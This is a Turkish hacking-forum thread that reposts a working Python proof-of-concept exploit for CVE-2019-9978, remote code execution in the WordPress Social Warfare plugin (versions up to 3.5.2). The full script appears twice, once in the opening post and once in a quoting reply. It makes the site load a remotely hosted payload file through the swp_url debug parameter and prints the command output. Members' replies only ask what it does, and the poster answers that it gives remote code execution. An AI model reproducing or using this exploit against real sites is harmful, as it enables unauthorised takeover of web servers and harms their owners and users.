Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...





Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 2 Hafta önce   #1
  • Underground Tim
  • Üye Bilgileri
Üyelik tarihi
01/2015
Mesajlar
Konular

Teşekkür (Etti): 70
Teşekkür (Aldı): 67


Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution



# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 )
# Date: March, 2019
# Researcher: Luka Sikic
# Exploit Author: hash3liZer
# Download Link: https://wordpress.org/plugins/social-warfare/
# Reference: https://wpvulndb.com/vulnerabilities...aScxIYcm1XxWXM
# Github: https://github.com/hash3liZer/CVE-2019-9978
# Version: <=3D 3.5.2
# CVE: CVE-2019-9978


# PoC:



import sys
import requests
import re
import urlparse
import optparse

class EXPLOIT:

VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s"

def __init__(self, _t, _p):
self.target = _t
self.payload = _p

def engage(self):
uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload )
r = requests.get( uri )
if r.status_code == 500:
print "[*] Received Response From Server!"
rr = r.text
obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" ))
if obj:
resp = obj.groups()[0]
if resp:
print "[<] Received: "
print resp.replace( "lnbreak", "\n" )
else:
sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
else:
sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
else:
sys.exit( "[~] Unexpected Status Received!" )

def main():
parser = optparse.OptionParser( )

parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" )
parser.add_option( '' , '--payload-uri', dest="payload", default="", type="string", help="URI where the file payload.txt is located." )

(options, args) = parser.parse_args()

print "[>] Sending Payload to System!"
exploit = EXPLOIT( options.target, options.payload )
exploit.engage()

if __name__ == "__main__":
main()


 Offline  
 
Alıntı ile Cevapla
Alt 2 Hafta önce   #2
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
07/2017
Nereden
Pasifik
Mesajlar
Konular

Teşekkür (Etti): 15
Teşekkür (Aldı): 44




Sayın hocam bu tam olarak ne işe yarıyor pek bi bilgim yokta bu konularda



___________________________________________

Uyuyan Milletler Ya Ölür Ya da Köle Olarak Uyanır


☾☆ 𐰤𐰀∶𐰢𐰆𐱃𐰞𐰆∶𐱅𐰇𐰼𐰜𐰢∶𐰓𐰃𐰘𐰤𐰀 ☾☆
☾☆ ALGAN ☾☆

 Offline  
 
Alıntı ile Cevapla
Alt 2 Hafta önce   #3
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
08/2015
Nereden
İstanbul
Mesajlar
Konular
6

Teşekkür (Etti): 13
Teşekkür (Aldı): 2




Alıntı:
cakr1805´isimli üyeden Alıntı Mesajı göster
# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 )
# Date: March, 2019
# Researcher: Luka Sikic
# Exploit Author: hash3liZer
# Download Link: https://wordpress.org/plugins/social-warfare/
# Reference: https://wpvulndb.com/vulnerabilities...aScxIYcm1XxWXM
# Github: https://github.com/hash3liZer/CVE-2019-9978
# Version: <=3D 3.5.2
# CVE: CVE-2019-9978


# PoC:



import sys
import requests
import re
import urlparse
import optparse

class EXPLOIT:

VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s"

def __init__(self, _t, _p):
self.target = _t
self.payload = _p

def engage(self):
uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload )
r = requests.get( uri )
if r.status_code == 500:
print "[*] Received Response From Server!"
rr = r.text
obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" ))
if obj:
resp = obj.groups()[0]
if resp:
print "[<] Received: "
print resp.replace( "lnbreak", "\n" )
else:
sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
else:
sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
else:
sys.exit( "[~] Unexpected Status Received!" )

def main():
parser = optparse.OptionParser( )

parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" )
parser.add_option( '' , '--payload-uri', dest="payload", default="", type="string", help="URI where the file payload.txt is located." )

(options, args) = parser.parse_args()

print "[>] Sending Payload to System!"
exploit = EXPLOIT( options.target, options.payload )
exploit.engage()

if __name__ == "__main__":
main()


Hocam eklenti işlevi nedir



___________________________________________

|͇ Λ ͇||̶ ̶ ̶ ̶| |͇̿ ͇̿ ͇̿||̶̿ ̶̿ ̶̿ ̶̿||̿ V ̿||

 Offline  
 
Alıntı ile Cevapla
Alt 2 Hafta önce   #4
  • Underground Tim
  • Üye Bilgileri
Üyelik tarihi
01/2015
Mesajlar
Konular

Teşekkür (Etti): 70
Teşekkür (Aldı): 67




Alıntı:
DemirBeY10´isimli üyeden Alıntı Mesajı göster
Sayın hocam bu tam olarak ne işe yarıyor pek bi bilgim yokta bu konularda
Konuyu inceleyerek detaylı bilgiye ne işe yaradığını ve nasıl kullanıldığını öğrenebilirsiniz.

https://www.turkhackteam.org/exploit...imi-nedir.html

Alıntı:
hamza1213´isimli üyeden Alıntı Mesajı göster
Hocam eklenti işlevi nedir
Uzaktan kod yürütmenizi sağlayan bir exploit.

Konu Black Turtle tarafından ( 2 Hafta önce Saat 17:35 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Alt 2 Hafta önce   #5
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
05/2016
Nereden
Nereye !
Yaş
4
Mesajlar
Konular

Teşekkür (Etti): 333
Teşekkür (Aldı): 1604







___________________________________________

Düşme!
Düşersen, bağımsızlığını ilan eder dostların,
Düşünce, bütün düşüncelerin değişir hayata dair.
Yılanın ne kadar masum, kurdun suçsuz, çakalın çakal olmadığını anlarsın iki yüzlü insanları görünce
,
Düşme!

10'uncu Köyden!
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau